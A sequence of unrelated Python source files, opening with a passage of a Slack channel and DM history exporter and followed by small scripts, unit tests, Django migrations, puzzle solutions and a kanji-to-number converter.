requests.post(self.url, data=json.dumps(data), timeout=self.timeout, proxies=self.proxies) # Patched class Slacker(object): oauth = OAuth(timeout=DEFAULT_TIMEOUT) def __init__(self, token, headers=None, incoming_webhook_url=None, timeout=DEFAULT_TIMEOUT, http_proxy=None, https_proxy=None, session=None, rate_limit_retries=DEFAULT_RETRIES): proxies = self.__create_proxies(http_proxy, https_proxy) api_args = { 'headers': headers, 'token': token, 'timeout': timeout, 'proxies': proxies, 'session': session, 'rate_limit_retries': rate_limit_retries, } self.im = IM(**api_args) self.api = API(**api_args) self.dnd = DND(**api_args) self.rtm = RTM(**api_args) self.apps = Apps(**api_args) self.auth = Auth(**api_args) self.bots = Bots(**api_args) self.chat = Chat(**api_args) self.dialog = Dialog(**api_args) self.team = Team(**api_args) self.pins = Pins(**api_args) self.mpim = MPIM(**api_args) self.users = Users(**api_args) self.files = Files(**api_args) self.stars = Stars(**api_args) self.emoji = Emoji(**api_args) self.search = Search(**api_args) self.groups = Groups(**api_args) self.channels = Channels(**api_args) self.presence = Presence(**api_args) self.reminders = Reminders(**api_args) self.migration = Migration(**api_args) self.reactions = Reactions(**api_args) self.idpgroups = IDPGroups(**api_args) self.usergroups = UserGroups(**api_args) self.conversations = Conversations(**api_args) self.incomingwebhook = IncomingWebhook(url=incoming_webhook_url, timeout=timeout, proxies=proxies) def __create_proxies(self, http_proxy=None, https_proxy=None): proxies = dict() if http_proxy: proxies['http'] = http_proxy if https_proxy: proxies['https'] = https_proxy return proxies ################################################################## # Obtains all replies for a given channel id + a starting timestamp # Duplicates the logic in getHistory def getReplies(channelId, timestamp, pageSize=1000): conversationObject = slack.conversations messages = [] lastTimestamp = None while True: try: response = conversationObject.replies( channel=channelId, ts=timestamp, latest=lastTimestamp, oldest=0, limit=pageSize, ).body except requests.exceptions.HTTPError as e: if e.response.status_code == 429: retryInSeconds = int(e.response.headers["Retry-After"]) print("Rate limit hit. Retrying in {0} second{1}.".format(retryInSeconds, "s" if retryInSeconds > 1 else "")) sleep(retryInSeconds) response = conversationObject.replies( channel=channelId, ts=timestamp, latest=lastTimestamp, oldest=0, limit=pageSize, ).body messages.extend(response["messages"]) if response["has_more"] == True: sys.stdout.write(".") sys.stdout.flush() lastTimestamp = messages[-1]["ts"] # -1 means last element in a list sleep(1.3) # Respect the Slack API rate limit else: break if lastTimestamp != None: print("") messages.sort(key=lambda message: message["ts"]) # Obtaining replies also gives us the first message in the the thread # (which we don't want) -- after sorting, our first message with the be the # first in the list of all messages, so we remove the head of the list assert messages[0]["ts"] == timestamp, "unexpected start of thread" messages = messages[1:] return messages # fetches the complete message history for a channel/group/im # # pageableObject could be: # slack.channel # slack.groups # slack.im # # channelId is the id of the channel/group/im you want to download history for. def getHistory(pageableObject, channelId, pageSize = 1000): messages = [] lastTimestamp = None while(True): try: if isinstance(pageableObject, Conversations): response = pageableObject.history( channel=channelId, latest=lastTimestamp, oldest=0, limit=pageSize ).body else: response = pageableObject.history( channel = channelId, latest = lastTimestamp, oldest = 0, count = pageSize ).body except requests.exceptions.HTTPError as e: if e.response.status_code == 429: retryInSeconds = int(e.response.headers['Retry-After']) print("Rate limit hit. Retrying in {0} second{1}.".format(retryInSeconds, "s" if retryInSeconds > 1 else "")) sleep(retryInSeconds) if isinstance(pageableObject, Conversations): response = pageableObject.history( channel=channelId, latest=lastTimestamp, oldest=0, limit=pageSize ).body else: response = pageableObject.history( channel=channelId, latest=lastTimestamp, oldest=0, count=pageSize ).body messages.extend(response['messages']) # Grab all replies for message in response["messages"]: if "thread_ts" in message: sleep(0.5) #INSERT LIMIT messages.extend(getReplies(channelId, message["thread_ts"], pageSize)) if (response['has_more'] == True): sys.stdout.write("*") sys.stdout.flush() lastTimestamp = messages[-1]['ts'] # -1 means last element in a list sleep(1.3) # Respect the Slack API rate limit else: break if lastTimestamp != None: print("") messages.sort(key = lambda message: message['ts']) return messages def mkdir(directory): if not os.path.isdir(directory): os.makedirs(directory) # create datetime object from slack timestamp ('ts') string def parseTimeStamp( timeStamp ): if '.' in timeStamp: t_list = timeStamp.split('.') if len( t_list ) != 2: raise ValueError( 'Invalid time stamp' ) else: return datetime.utcfromtimestamp( float(t_list[0]) ) # move channel files from old directory to one with new channel name def channelRename( oldRoomName, newRoomName ): # check if any files need to be moved if not os.path.isdir( oldRoomName ): return mkdir( newRoomName ) for fileName in os.listdir( oldRoomName ): shutil.move( os.path.join( oldRoomName, fileName ), newRoomName ) os.rmdir( oldRoomName ) def writeMessageFile( fileName, messages ): directory = os.path.dirname(fileName) # if there's no data to write to the file, return if not messages: return if not os.path.isdir( directory ): mkdir( directory ) with open(fileName, 'w') as outFile: json.dump( messages, outFile, indent=4) # parse messages by date def parseMessages( roomDir, messages, roomType ): nameChangeFlag = roomType + "_name" currentFileDate = '' currentMessages = [] for message in messages: #first store the date of the next message ts = parseTimeStamp( message['ts'] ) fileDate = '{:%Y-%m-%d}'.format(ts) #if it's on a different day, write out the previous day's messages if fileDate != currentFileDate: outFileName = '{room}/{file}.json'.format( room = roomDir, file = currentFileDate ) writeMessageFile( outFileName, currentMessages ) currentFileDate = fileDate currentMessages = [] # check if current message is a name change # dms won't have name change events if roomType != "im" and ( 'subtype' in message ) and message['subtype'] == nameChangeFlag: roomDir = message['name'] oldRoomPath = message['old_name'] newRoomPath = roomDir channelRename( oldRoomPath, newRoomPath ) currentMessages.append( message ) outFileName = '{room}/{file}.json'.format( room = roomDir, file = currentFileDate ) writeMessageFile( outFileName, currentMessages ) def filterConversationsByName(channelsOrGroups, channelOrGroupNames): return [conversation for conversation in channelsOrGroups if conversation['name'] in channelOrGroupNames] def promptForPublicChannels(channels): channelNames = [channel['name'] for channel in channels] selectedChannels = pick(channelNames, 'Select the Public Channels you want to export:', multi_select=True) return [channels[index] for channelName, index in selectedChannels] # fetch and write history for all public channels def fetchPublicChannels(channels): print("Fetching", len(channels), "public channels") if dryRun: print("Public Channels selected for export:") for channel in channels: print(channel['name']) print() return for channel in channels: channelDir = channel['name'] print("Fetching history for Public Channel: {0}".format(channelDir)) try: mkdir( channelDir ) except NotADirectoryError: # Failed creating directory, probably because the name is not a valid # Windows directory name (like "com4"). Adding a prefix to try to work-around # that. channelDir = ("c-" + channel['name']) mkdir( channelDir ) messages = getHistory(slack.conversations, channel['id']) parseMessages( channelDir, messages, 'channel') # write channels.json file def dumpChannelFile(): print("Making channels file") private = [] mpim = [] for group in groups: if group['is_mpim']: mpim.append(group) continue private.append(group) # slack viewer wants DMs to have a members list, not sure why but doing as they expect for dm in dms: dm['members'] = [dm['user'], tokenOwnerId] #We will be overwriting this file on each run. with open('channels.json', 'w') as outFile: json.dump( channels , outFile, indent=4) with open('groups.json', 'w') as outFile: json.dump( private , outFile, indent=4) with open('mpims.json', 'w') as outFile: json.dump( mpim , outFile, indent=4) with open('dms.json', 'w') as outFile: json.dump( dms , outFile, indent=4) def filterDirectMessagesByUserNameOrId(dms, userNamesOrIds): userIds = [userIdsByName.get(userNameOrId, userNameOrId) for userNameOrId in userNamesOrIds] return [dm for dm in dms if dm['user'] in userIds] def promptForDirectMessages(dms): dmNames = [userNamesById.get(dm['user'], dm['user'] + " (name unknown)") for dm in dms] selectedDms = pick(dmNames, 'Select the 1:1 DMs you want to export:', multi_select=True) return [dms[index] for dmName, index in selectedDms] # fetch and write history for all direct message conversations # also known as IMs in the slack API. def fetchDirectMessages(dms): print("Fetching", len(dms), "1:1 DMs") if dryRun: print("1:1 DMs selected for export:") for dm in dms: print(userNamesById.get(dm['user'], dm['user'] + " (name unknown)")) print() return for dm in dms: name = userNamesById.get(dm['user'], dm['user'] + " (name unknown)") print("Fetching 1:1 DMs with {0}".format(name)) dmId = dm['id'] mkdir(dmId) messages = getHistory(slack.conversations, dm['id']) parseMessages( dmId, messages, "im" ) def promptForGroups(groups): groupNames = [group['name'] for group in groups] selectedGroups = pick(groupNames, 'Select the Private Channels and Group DMs you want to export:', multi_select=True) return [groups[index] for groupName, index in selectedGroups] # fetch and write history for specific private channel # also known as groups in the slack API. def fetchGroups(groups): print("Fetching", len(groups), "Private Channels and Group DMs") if dryRun: print("Private Channels and Group DMs selected for export:") for group in groups: print(group['name']) print() return for group in groups: groupDir = group['name'] mkdir(groupDir) messages = [] print("Fetching history for Private Channel / Group DM: {0}".format(group['name'])) messages = getHistory(slack.conversations, group['id']) parseMessages( groupDir, messages, 'group' ) # fetch all users for the channel and return a map userId -> userName def getUserMap(): global userNamesById, userIdsByName for user in users: userNamesById[user['id']] = user['name'] userIdsByName[user['name']] = user['id'] # stores json of user info def dumpUserFile(): #write to user file, any existing file needs to be overwritten. with open( "users.json", 'w') as userFile: json.dump( users, userFile, indent=4 ) # get basic info about the slack channel to ensure the authentication token works def doTestAuth(): testAuth = slack.auth.test().body teamName = testAuth['team'] currentUser = testAuth['user'] print("Successfully authenticated for team {0} and user {1} ".format(teamName, currentUser)) return testAuth # Since Slacker does not Cache.. populate some reused lists def bootstrapKeyValues(): global users, channels, groups, dms users = slack.users.list().body['members'] print("Found {0} Users".format(len(users))) sleep(3.05) channels = slack.conversations.list(limit = 1000, types=('public_channel')).body['channels'] print("Found {0} Public Channels".format(len(channels))) # think mayne need to retrieve channel memberships for the slack-export-viewer to work for n in range(len(channels)): channels[n]["members"] = slack.conversations.members(limit=1000, channel=channels[n]['id']).body['members'] print("Retrieved members of {0}".format(channels[n]['name'])) sleep(3.05) groups = slack.conversations.list(limit = 1000, types=('private_channel', 'mpim')).body['channels'] print("Found {0} Private Channels or Group DMs".format(len(groups))) # need to retrieve channel memberships for the slack-export-viewer to work for n in range(len(groups)): groups[n]["members"] = slack.conversations.members(limit=1000, channel=groups[n]['id']).body['members'] print("Retrieved members of {0}".format(groups[n]['name'])) sleep(3.05) dms = slack.conversations.list(limit = 1000, types=('im')).body['channels'] print("Found {0} 1:1 DM conversations\n".format(len(dms))) sleep(3.05) getUserMap() # Returns the conversations to download based on the command-line arguments def selectConversations(allConversations, commandLineArg, filter, prompt): global args if args.excludeArchived: allConversations = [ conv for conv in allConversations if not conv["is_archived"] ] if isinstance(commandLineArg, list) and len(commandLineArg) > 0: return filter(allConversations, commandLineArg) elif commandLineArg != None or not anyConversationsSpecified(): if args.prompt: return prompt(allConversations) else: return allConversations else: return [] # Returns true if any conversations were specified on the command line def anyConversationsSpecified(): global args return args.publicChannels != None or args.groups != None or args.directMessages != None # This method is used in order to create a empty Channel if you do not export public channels # otherwise, the viewer will error and not show the root screen. Rather than forking the editor, I work with it. def dumpDummyChannel(): channelName = channels[0]['name'] mkdir( channelName ) fileDate = '{:%Y-%m-%d}'.format(datetime.today()) outFileName = '{room}/{file}.json'.format( room = channelName, file = fileDate ) writeMessageFile(outFileName, []) def downloadFiles(token, cookie_header=None): """ Iterate through all json files, downloads files stored on files.slack.com and replaces the link with a local one Args: jsonDirectory: folder where the json files are in, will be searched recursively """ print("Starting to download files") for root, subdirs, files in os.walk("."): for filename in files: if not filename.endswith('.json'): continue filePath = os.path.join(root, filename) data = [] with open(filePath) as inFile: data = json.load(inFile) for msg in data: for slackFile in msg.get("files", []): # Skip deleted files if slackFile.get("mode") == "tombstone": continue for key, value in slackFile.items(): # Find all entries referring to files on files.slack.com if not isinstance(value, str) or not value.startswith("https://files.slack.com/"): continue url = urlparse(value) localFile = os.path.join("../files.slack.com", url.path[1:]) # Need to discard first "/" in URL, because: # "If a component is an absolute path, all previous components are thrown away and joining continues # from the absolute path component." print("Downloading %s, saving to %s" % (url.geturl(), localFile)) # Create folder structure os.makedirs(os.path.dirname(localFile), exist_ok=True) # Replace URL in data - suitable for use with slack-export-viewer if files.slack.com is linked slackFile[key] = "/static/files.slack.com%s" % url.path # Check if file already downloaded, with a non-zero size # (can't check for same size because thumbnails don't have a size) if os.path.exists(localFile) and (os.path.getsize(localFile) > 0): print("Skipping already downloaded file: %s" % localFile) continue # Download files headers = {"Authorization": f"Bearer {token}", **cookie_header} r = requests.get(url.geturl(), headers=headers) try: open(localFile, 'wb').write(r.content) except FileNotFoundError: print("File writing error-still all broken") continue # Save updated data to json file with open(filePath, "w") as outFile: json.dump(data, outFile, indent=4, sort_keys=True) print("Replaced all files in %s" % filePath) def finalize(): os.chdir('..') if zipName: shutil.make_archive(zipName, 'zip', outputDirectory, None) shutil.rmtree(outputDirectory) exit() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Export Slack history') parser.add_argument('--token', required=True, help="Slack API token") parser.add_argument('--cookie', help="a set of cookies for the xoxc api token") parser.add_argument('--zip', help="Name of a zip file to output as") parser.add_argument( '--dryRun', action='store_true', default=False, help="List the conversations that will be exported (don't fetch/write history)") parser.add_argument( '--publicChannels', nargs='*', default=None, metavar='CHANNEL_NAME', help="Export the given Public Channels") parser.add_argument( '--groups', nargs='*', default=None, metavar='GROUP_NAME', help="Export the given Private Channels / Group DMs") parser.add_argument( '--directMessages', nargs='*', default=None, metavar='USER_NAME', help="Export 1:1 DMs with the given users") parser.add_argument( '--prompt', action='store_true', default=False, help="Prompt you to select the conversations to export") parser.add_argument( '--downloadSlackFiles', action='store_true', default=False, help="Downloads files from files.slack.com for local access, stored in 'files.slack.com' folder. " "Link this folder inside slack-export-viewer/slackviewer/static/ to have it work seamless with slack-export-viewer") parser.add_argument( '--excludeArchived', action='store_true', default=False, help="Do not export channels that have been archived") parser.add_argument( '--excludeNonMember', action='store_true', default=False, help="Only export public channels if the user is a member of the channel") args = parser.parse_args() users = [] channels = [] groups = [] dms = [] userNamesById = {} userIdsByName = {} cookie_header = {'cookie': args.cookie} slack = Slacker(headers=cookie_header, token=args.token) testAuth = doTestAuth() tokenOwnerId = testAuth['user_id'] bootstrapKeyValues() dryRun = args.dryRun zipName = args.zip outputDirectory = "{0}-slack_export".format(datetime.today().strftime("%Y%m%d-%H%M%S")) mkdir(outputDirectory) os.chdir(outputDirectory) if not dryRun: dumpUserFile() dumpChannelFile() selectedChannels = selectConversations( channels, args.publicChannels, filterConversationsByName, promptForPublicChannels) if args.excludeNonMember: selectedChannels = [ channel for channel in selectedChannels if channel["is_member"] ] selectedGroups = selectConversations( groups, args.groups, filterConversationsByName, promptForGroups) selectedDms = selectConversations( dms, args.directMessages, filterDirectMessagesByUserNameOrId, promptForDirectMessages) if len(selectedChannels) > 0: fetchPublicChannels(selectedChannels) if len(selectedGroups) > 0: if len(selectedChannels) == 0: dumpDummyChannel() fetchGroups(selectedGroups) if len(selectedDms) > 0: fetchDirectMessages(selectedDms) if args.downloadSlackFiles: downloadFiles(token=args.token, cookie_header=cookie_header) finalize()
nilq/baby-python
python
from .CSGOMarketAPI import * from .Exceptions import * from .Item import * from .types import * __all__ = ['Item', 'CSGOMarketAPI', 'Exceptions', 'types']
nilq/baby-python
python
#----------------------------------------------------- # Mimas: conference submission and review system # (c) Allan Kelly 2016-2020 http://www.allankelly.net # Licensed under MIT License, see LICENSE file # ----------------------------------------------------- import unittest import datetime from google.appengine.ext import testbed from conference_lib import conference from schedule_lib import schedule, schedelement class TestScheduleElement(unittest.TestCase): def setUp(self): self.testbed = testbed.Testbed() self.testbed.activate() self.testbed.init_datastore_v3_stub() self.testbed.init_memcache_stub() self.c = conference.Conference() def tearDown(self): self.testbed.deactivate() def testMakeRetrieve(self): sched_key = schedule.get_conference_schedule(self.c.key) self.assertEquals([], schedelement.retreieve_elements(sched_key)) element_key = schedelement.mk_element(sched_key, "Coffee") element = element_key.get() self.assertEquals("Coffee", element.title()) self.assertEquals([element], schedelement.retreieve_elements(sched_key)) element_key2 = schedelement.mk_element(sched_key, "Lunch") element2 = element_key2.get() self.assertEquals("Lunch", element2.title()) elements = schedelement.retreieve_elements(sched_key) sorted_elements = sorted(elements, key=(lambda t: t.title_db)) self.assertEquals([element, element2], sorted_elements)
nilq/baby-python
python
import pandas as pd import yfinance as yf from src.config import Config def main(cfg: Config): metadata = pd.read_csv(cfg.METADATA_FILEPATH, comment="#") ticker_symbols = " ".join(metadata[cfg.TICKER_SYMBOL_COLUMN]) data = yf.download(tickers=ticker_symbols, period=cfg.PERIOD, interval=cfg.INTERVAL, group_by="ticker") data.to_pickle(cfg.OUTPUT_FILEPATH) if __name__ == "__main__": config = Config.load(__file__) main(config)
nilq/baby-python
python
import sys n, *a = map(int, sys.stdin.read().split()) def main(): res = 0 for i in range(1, n-1): cur = a[i] l = 0 for j in range(i): if a[j] < cur: l += 1 r = 0 for j in range(i+1, n): if a[j] < cur: r += 1 res += l * r return res if __name__ == '__main__': ans = main() print(ans)
nilq/baby-python
python
import numpy as np from random import randint import matplotlib.pyplot as plt def createTestData(X, y, word): img_word = [] word = str(word) for char in range(len(word)): if(word[char] == ' '): img_word.append(-1) else: indices = [i for i, x in enumerate(y) if x == word[char]] if len(indices) == 0: raise ReferenceError('No image of text: "%s"' % word[char]) img_word.append(indices[randint(0, len(indices)-1)]) del indices img = np.empty([128,0]) for i in range(len(word)): if img_word[i] == -1: tmp = np.zeros((128,128)) tmp.fill(255) img = np.concatenate((img, tmp), axis=1) del tmp else: img = np.concatenate((img, X[img_word[i]]), axis=1) return img def mserSegmentify(img): ## experimental import cv2 img = cv2.imread('image.jpg', 0); vis = img.copy() mser = cv2.MSER_create() regions = mser.detectRegions(img, None) hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions] cv2.polylines(vis, hulls, 4, (0, 255, 0)) cv2.imshow('img', vis) cv2.waitKey(0) cv2.destroyAllWindows() def lineSegmentify(img): img = img.T actualImg = np.empty([128, 0]) actualImgs = np.empty([0,128,128]) oldPresent = None for row in xrange(img.shape[0]): # len imagePresent = False for col in xrange(img.shape[1]): #wid if img[row][col] < 200: imagePresent = True # true if black pixel is found if(oldPresent == 1 and imagePresent == 0) or (row == (image.shape[0] - 1)): padLeft = int(np.floor((128-actualImg.shape[1])/2.0)) padRight = int(np.ceil((128-actualImg.shape[1])/2.0)) vec128 = np.zeros((128,1)) vec128.fill(255) for i in xrange(padLeft): actualImg = np.concatenate((vec128, actualImg), axis=1) for i in xrange(padRight): actualImg = np.concatenate((actualImg, vec128), axis=1) actualImgs = np.concatenate((actualImgs, actualImg.reshape(1,128,128)), axis = 0) actualImg = np.empty([128, 0]) if imagePresent == True: actualImg = np.concatenate((actualImg, img[row].reshape(128,1)), axis = 1) oldPresent = imagePresent return actualImgs def overfitSegmentify(img): print img.shape for row in range(img.shape[1]): #length for col in range(img.shape[0]): # width if(img[col][row] < 200): img[col][row] = 0.5 else: pass return img def segmentify(img, algorithm='line'): if(algorithm=='line'): return lineSegmentify(img) elif(algorithm=='overfit'): return overfitSegmentify(img) elif(algorithm=='mser'): return mserSegmentify(img) else: raise ValueError('Please specify a valid algorithm') #THRESHOLD = 200 # #def segmentify2(image): # # image = image.T # imageStarted = False # # parts = [] # start = None # # for i in xrange(image.shape[0]): # # if np.any(image[i] < THRESHOLD) and not imageStarted: # # imageStarted = True # start = i # # elif imageStarted and not np.any(image[i] < THRESHOLD): # imageStarted = False # # seperated = image[start:i].T # temp = np.zeros((128, 128)) + 255 # # temp[:seperated.shape[0],:seperated.shape[1]] = seperated # parts.append(temp) # # return np.array(parts) # # if __name__ == '__main__': # load data import loadData as lD X, y = lD.loadNISTSD19(amt_batches=1) # create sample data to perform image segmentation img = createTestData(X, y, '4chan org h') del X, y # perform image segmentation, return 3D array img = segmentify(img) # show image for i in range(img.shape[0]): plt.imshow(img[i]) plt.show()
nilq/baby-python
python
#!/usr/bin/env python def part1(path): with open(path) as f: lines = f.read().strip().split("\n") earliest = int(lines[0]) ids = [int(x) for x in lines[1].split(",") if x != "x"] a = [(id, ((earliest // id) + 1) * id) for id in ids] min_ = min(a, key=lambda x: x[1]) return (min_[1] - earliest) * min_[0] def get_term(a, b, diff, d): i = 1 while True: answer = a * i + d if (answer + diff) % b == 0: break else: i += 1 first = answer i += 1 while True: answer = a * i + d if (answer + diff) % b == 0: break else: i += 1 second = answer d = second - first return first, d def part2(path): with open(path) as f: lines = f.read().strip().split("\n") buses = [ (int(id), arrival) for arrival, id in enumerate([x for x in lines[1].split(",")]) if id != "x" ] n = len(buses) first, d = get_term(buses[0][0], buses[1][0], buses[1][1], 0) for i in range(2, n): id_, arrival = buses[i] first, d = get_term(d, id_, arrival, first) return first def main(): assert part1("input.txt") == 3215 # assert part2("example1.txt") == 1068781 # assert part2("example2.txt") == 3417 # assert part2("example3.txt") == 754018 # assert part2("example4.txt") == 779210 # assert part2("example5.txt") == 1261476 # assert part2("example6.txt") == 1202161486 assert part2("input.txt") == 1001569619313439 print("All tests passed.") if __name__ == "__main__": main() # Graveyard # passes all tests except for the input ... (does not seem to halt) # def part2(path): # with open(path) as f: # lines = f.read().strip().split("\n") # # buses = [ # (int(id), arrival) # for arrival, id in enumerate([x for x in lines[1].split(",")]) # if id != "x" # ] # # answer = buses[0][0] # increment = buses[0][0] # n = len(buses) # # print(buses) # # for i in range(1, n): # id_, arrival = buses[i] # while True: # if answer < id_: # answer += increment # continue # if answer % id_ == 0: # answer += increment # continue # if (((answer // id_) + 1) * id_ - answer) == arrival: # increment *= id_ # likely mistake here # break # else: # answer += increment # return answer
nilq/baby-python
python
from tests.test_limesurvey import TestBase from limesurveyrc2api.limesurvey import LimeSurveyError class TestSurveys(TestBase): def test_list_surveys_success(self): """A valid request for list of surveys should not return empty.""" result = self.api.survey.list_surveys() for survey in result: self.assertIsNotNone(survey.get('sid')) def test_list_surveys_failure(self): """An invalid request for list of surveys should raise an error.""" with self.assertRaises(LimeSurveyError) as ctx: self.api.survey.list_surveys(username="not_a_user") self.assertIn("Invalid user", ctx.exception.message) def test_list_questions_success(self): """Listing questions for a survey should return a question list.""" result = self.api.survey.list_questions(survey_id=self.survey_id) for question in result: self.assertEqual(self.survey_id, question["sid"]) self.assertIsNotNone(question["gid"]) self.assertIsNotNone(question["qid"]) def test_list_questions_failure(self): """Listing questions for an invalid survey should returns an error.""" with self.assertRaises(LimeSurveyError) as ctx: self.api.survey.list_questions(self.survey_id_invalid) self.assertIn("Error: Invalid survey ID", ctx.exception.message)
nilq/baby-python
python
try: a except Exc as b: b except Exc2 as c: b # Check that capturing vars are properly local def foo(): try: a except Exc as b: b
nilq/baby-python
python
# Generated by Django 2.1.3 on 2018-12-03 07:00 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('users', '0008_auto_20181203_0659'), ] operations = [ migrations.RenameField( model_name='user', old_name='followings', new_name='following', ), ]
nilq/baby-python
python
# -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-02-21 19:10 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('lookup_tables', '0015_auto_20170220_1348'), ] operations = [ migrations.AlterField( model_name='searcharea', name='total_searchable', field=models.DecimalField(blank=True, decimal_places=10, max_digits=20, null=True), ), ]
nilq/baby-python
python
# Boolean Variables x = True print(bool(x)) x = 4 y = 4 print("X :",x) print("Y :",y) print("Is X=Y ? " , bool(x==y)) y = 3 print("Y :",y) print("Is X=Y ? " , bool(x==y)) print("NOTE : If empty sequence, strings, values, are passed, then bool returns false") def mod(num): return (bool(num%2==0)) num = int(input("Enter number to check for even or odd : ")) if(mod(num)): print("Even") else: print("Odd") input("Press Enter key to exit ")
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- class qKanji2num_class: def __init__(self, ): self.kans = '〇一二三四五六七八九' self.tais1 = '千百十' self.tais2 = '京兆億万' self.suuji = {'〇', '一', '二', '三', '四', '五', '六', '七', '八', '九', '十', \ '百', '千', '万', '億', '兆', \ '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', \ '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'} # 関数(1)_漢数字(例:二三五六〇一)を単純変換する関数 def kan2num(self, text): for i, tmp in enumerate(self.kans): text = text.replace(tmp, str(i)) # replaceメソッドで置換 return text # 関数(2)_4桁までの漢数字(例:六千五百八)を数値変換する関数 def kans2numf(self, text): ans = 0 # 初期値(計算結果を加算していく) poss = 0 # スタート位置 for i, tmp in enumerate(self.tais1): pos = text.find(tmp) # 大数(千百十)の位置を順次特定 if pos == -1: # 対象となる大数(千百十)が無い場合 block = 0 pos = poss - 1 elif pos == poss: # '二千百'のように'千'と'百'の間に数字がない場合 block = 1 else: block = int(self.kan2num(text[poss:pos])) # 'possとposの間の漢数字を数値に変換 ans += block * (10 ** (len(self.tais1) - i)) poss = pos + 1 # possをposの次の位置に設定 if poss != len(text): # 一の位の数字がある場合 ans += int(self.kan2num(text[poss:len(text)])) return ans # 関数(3)_20桁までの漢数字(例:六兆五千百億十五万八千三十二)を数値変換する関数 def kans2num(self, text): ans = 0 poss = 0 for i, tmp in enumerate(self.tais2): pos = text.find(tmp) if pos == -1: block = 0 pos = poss - 1 elif pos == poss: block = 1 else: block = self.kans2numf(text[poss:pos]) ans += block * (10 ** (4 * (len(self.tais2) - i))) poss = pos + 1 if poss != len(text): ans += self.kans2numf(text[poss:len(text)]) return ans # 関数(4)_文字列中の漢数字を算用数字に変換する関数(カンマ表示に簡易対応) def strkan2num(self, text): ans = '' tmp = '' for chr in text: if chr in self.suuji or (tmp != '' and chr == ','): # 文字が数字又はカンマの場合 tmp += chr # 数字が続く限りtmpに格納 else: # 文字が数字でない場合 if tmp != '': # tmpに数字が格納されている場合 ans += str(self.kans2num(tmp.replace(',', ''))) #算用数字に変換して連結 tmp = '' ans += chr if tmp != '': # 文字列の最後が数字で終わる場合の処理 ans += str(self.kans2num(tmp.replace(',', ''))) return ans if __name__ == '__main__': #kn = qClass_Kanji2num.qKanji2num_class() kn = qKanji2num_class() print(kn.strkan2num('平成二十三年十一月二十三日に5,000円使った')) print(kn.strkan2num('2018年10-12月期における日本の名目GDPは五百四十八兆七千七百二十億円、実質GDPは534兆3,370億円です')) print(kn.strkan2num('十八才')) print(kn.strkan2num('二十五才')) print(kn.strkan2num('F二'))
nilq/baby-python
python
""" venvs creates virtualenvs. By default it places them in the appropriate data directory for your platform (See `appdirs <https://pypi.python.org/pypi/appdirs>`_), but it will also respect the :envvar:`WORKON_HOME` environment variable for compatibility with :command:`mkvirtualenv`. """ from functools import partial from filesystems import Path from packaging.requirements import Requirement import click from venvs import __version__ from venvs.common import _FILESYSTEM, _LINK_DIR, _ROOT @click.command(context_settings=dict(help_option_names=["-h", "--help"])) @_FILESYSTEM @_LINK_DIR @_ROOT @click.option( "-i", "--install", "installs", multiple=True, help=( "install the given specifier (package) into the " "virtualenv with pip after it is created" ), ) @click.option( "-l", "--link", "links", multiple=True, help=( "After installing any specified packages, link the specified " "binaries into the directory they would have been installed into " "globally." ), ) @click.option( "-r", "--requirement", "requirements", multiple=True, help=( "install the given requirements file into the " "virtualenv with pip after it is created" ), ) @click.option( "-R", "--recreate", flag_value=True, help="recreate the virtualenv if it already exists", ) @click.option( "-t", "--temp", "--temporary", "temporary", flag_value=True, help="create or reuse the global temporary virtualenv", ) @click.argument("name", required=False) @click.argument("virtualenv_args", nargs=-1, type=click.UNPROCESSED) @click.version_option(version=__version__) def main( filesystem, link_dir, name, locator, temporary, installs, links, requirements, recreate, virtualenv_args, ): if name: if temporary: raise click.BadParameter( "specify only one of '-t / --temp / --temporary' or 'name'", ) virtualenv = locator.for_name(name=name) elif temporary: virtualenv = locator.temporary() click.echo(virtualenv.binary("python").dirname()) act = partial(virtualenv.recreate_on, filesystem=filesystem) elif len(installs) == 1: # When there's just one package to install, default to using that name. requirement, = installs name = Requirement(requirement).name virtualenv = locator.for_name(name=name) elif installs: raise click.BadParameter("A name is required.") elif len(links) == 1: # When there's just one binary to link, go for the gold. name, = installs = links virtualenv = locator.for_name(name=name) else: virtualenv = locator.for_directory(directory=Path.cwd()) if recreate or temporary: act = partial(virtualenv.recreate_on, filesystem=filesystem) else: act = virtualenv.create act(arguments=virtualenv_args) virtualenv.install(packages=installs, requirements=requirements) for link in links: filesystem.link( source=virtualenv.binary(name=link), to=link_dir.descendant(link), )
nilq/baby-python
python
from itsdangerous import json from models.vagas import VagasEmpregoModel class VagasEmpregoService: def buscar_vaga(self, vaga_id: int) -> dict: vaga = VagasEmpregoModel.procurar_vaga(vaga_id) return vaga def listar_vagas(self) -> list: lista_vagas = VagasEmpregoModel.listar_vagas() vagas = [vaga_model.json() for vaga_model in lista_vagas] return vagas def criar_vaga(self, dados: dict) -> dict: vaga = VagasEmpregoModel(**dados) try: print(vaga) resultado = vaga.salvar_vaga() print(resultado) except Exception as e: return {"msg": "Erro ao persistir vaga.", "error": e}, 500 return vaga.json() def deletar_vaga(self, vaga_id: int) -> dict: vaga = self.buscar_vaga(vaga_id) vaga_deletada = vaga vaga.deletar_vaga() return vaga_deletada def atualizar_vaga(self, dados: dict) -> dict: nova_vaga = {**dados} return nova_vaga
nilq/baby-python
python
import matplotlib; matplotlib.use('Agg') from daft_builder import pgm import pytest def test_Param_init(): param = pgm.Param(r"$y$", xy=(0.5, 0.5), of=["x"]) assert param.name == "y" assert param.x, param.y == (0.5, 0.5) assert param.anchor_node is None assert param.edges_to == ["x"] @pytest.mark.parametrize("of", [ 22, 22.1, -1, 0 ]) def test_Param_init_referring_to_number_named_nodes(of): param = pgm.Param(r"$y$", xy=(1, 1), of=of) assert param.edges_to == [of] def test_init_Param_of_multiple_nodes(): param = pgm.Param(r"$y$", xy=(1, 1), of=["x", "w"]) assert param.edges_to == ["x", "w"] def test_Param_init_requires_valid_anchor(): with pytest.raises(ValueError): pgm.Param(r"$y$", xy=(1, 1)) def test_Text_init(): t = pgm.Text("some text", xy=(1, 1)) assert t.name == "some text" assert t.kwargs['plot_params'] == {"ec": "none"} t = pgm.Text("some text", "t", xy=(1, 1)) assert t.name == "t" assert t.kwargs['plot_params'] == {"ec": "none"}
nilq/baby-python
python
from .neurons import *
nilq/baby-python
python
